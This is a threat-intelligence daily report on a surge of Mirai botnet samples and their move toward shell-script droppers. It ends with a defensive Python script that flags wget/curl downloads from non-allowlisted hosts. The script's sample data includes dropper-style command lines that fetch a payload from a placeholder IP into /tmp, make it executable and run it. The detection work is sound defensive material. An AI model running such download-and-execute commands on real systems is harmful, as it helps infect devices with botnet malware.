Daily Summary
Mirai activity surged on 2026-05-10 with 100 new samples, a 75% increase over the 7-day average of 57. This marks the highest single-day volume observed in the current tracking period, indicating renewed interest in the DDoS botnet family. The spike is notable given the absence of new C2 servers, suggesting attackers are recycling or reconfiguring existing infrastructure.
New Samples Detected
A total of 100 unique samples were identified, with ELF files dominating at 36. This is consistent with Mirai’s typical cross-compilation targeting embedded Linux systems. Architecture-specific binaries include .arm7 (8), .arm5 (7), .ppc (5), .x86_64 (5), .mips (5), .sh4 (4), .m68k (4), .sh (3), and .mpsl (3). The inclusion of .sh (shell script) samples is noteworthy: it suggests dropper scripts are being used to fetch and execute the main binary, potentially evading static file scanning.
Distribution Methods
Based on the file type distribution, delivery likely involves automated scanners that identify vulnerable IoT devices (e.g., Telnet/SSH brute force), followed by shell scripts that download architecture-specific binaries. The .sh samples serve as lightweight first-stage payloads. No new C2 or distribution URLs were identified today, indicating reliance on previously established attack vectors or IP-based delivery.
Detection Rate
Given that 100 new samples were detected with zero new C2 servers, there is a moderate risk that some variants are evading signature-based detection. The use of shell scripts as initial payloads may bypass AV engines that focus on ELF binaries. Static analysis of the .sh files suggests obfuscation techniques are minimal, but dynamic behavior analysis remains challenging.
C2 Infrastructure
No new C2 servers were identified today. This is unusual given the spike in samples, implying that attackers are reusing existing C2 IPs or domains. The lack of geographic data prevents identification of hosting trends. Analysts should monitor previously known Mirai C2 infrastructure for configuration changes.
7-Day Trend
Mirai activity has been fluctuating, with the 7-day average at 57. Today’s surge to 100 samples represents a sharp upward deviation, suggesting a coordinated campaign or updated loader. If volumes remain elevated over the next 48 hours, this may signal a new botnet build.
Security Analysis
A non-obvious observation is the resurgence of shell script droppers (.sh files) mixed with traditional ELF binaries. Historically, Mirai reduced use of shell scripts in favor of direct binary drops. This shift suggests attackers are testing lower-friction delivery methods to defeat network-level blocking of unknown ELF files. Defensive recommendation: Enable command-line monitoring for wget/curl downloads from IPs not on internal allowlists, and block execution of scripts downloaded from external hosts unless explicitly approved.
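One way to implement the command-line monitoring recommended above, as an added example that is not part of the original report: it scans recorded command lines for wget/curl fetches from hosts outside an IP allowlist and for a later stage that executes what was fetched. The allowlist ranges, function names and sample command lines are constructed assumptions.

```python
import ipaddress
import re
import shlex

# Assumption: constructed internal allowlist; substitute your own ranges.
ALLOWLIST = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "192.168.10.0/24")]
DOWNLOADERS = {"wget", "curl"}
SHELLS = {"sh", "bash", "ash"}
TAKES_VALUE = {"-O", "-o", "--output", "--output-document"}  # next arg is a file, not a URL
STAGES = re.compile(r";|&&|\|\||\|")  # shell separators between chained commands
HOST = re.compile(r"^(?:\w+://)?([A-Za-z0-9][\w.-]*)(?::\d+)?/")

def is_allowed(host):
    """True only for IP literals inside the allowlist; hostnames count as external."""
    try:
        return any(ipaddress.ip_address(host) in net for net in ALLOWLIST)
    except ValueError:
        return False

def external_hosts(argv):
    """Hosts a wget/curl invocation fetches from that are not allowlisted."""
    hosts, skip = [], False
    for arg in argv[1:]:
        if skip or arg.startswith("-"):
            skip = arg in TAKES_VALUE and not skip
            continue
        m = HOST.match(arg)
        if m and not is_allowed(m.group(1)):
            hosts.append(m.group(1))
    return hosts

def analyze(cmdline):
    """Return findings for one recorded command line (e.g. from process auditing)."""
    findings, fetched = [], False
    for argv in filter(None, map(shlex.split, STAGES.split(cmdline))):
        tool = argv[0].rsplit("/", 1)[-1]
        if tool in DOWNLOADERS:
            hosts = external_hosts(argv)
            findings += [f"external-download:{h}" for h in hosts]
            fetched = fetched or bool(hosts)
        elif fetched and (tool in SHELLS or argv[0].startswith(("./", "/tmp/"))):
            findings.append("download-then-execute")
    return findings

# Constructed sample command lines (documentation-range addresses).
SAMPLES = [
    "cd /tmp; wget http://198.51.100.7/bins.sh; chmod 777 bins.sh; sh bins.sh",
    "curl -s -o /tmp/fw.bin http://10.20.30.40/fw.bin",
    "wget -O /tmp/a 192.0.2.55/bot.arm7 && chmod +x /tmp/a && /tmp/a",
]
```

Calling `analyze()` on each entry of `SAMPLES` flags the first and third lines and returns an empty list for the allowlisted internal download. Hostnames are treated as external because the allowlist is IP-based.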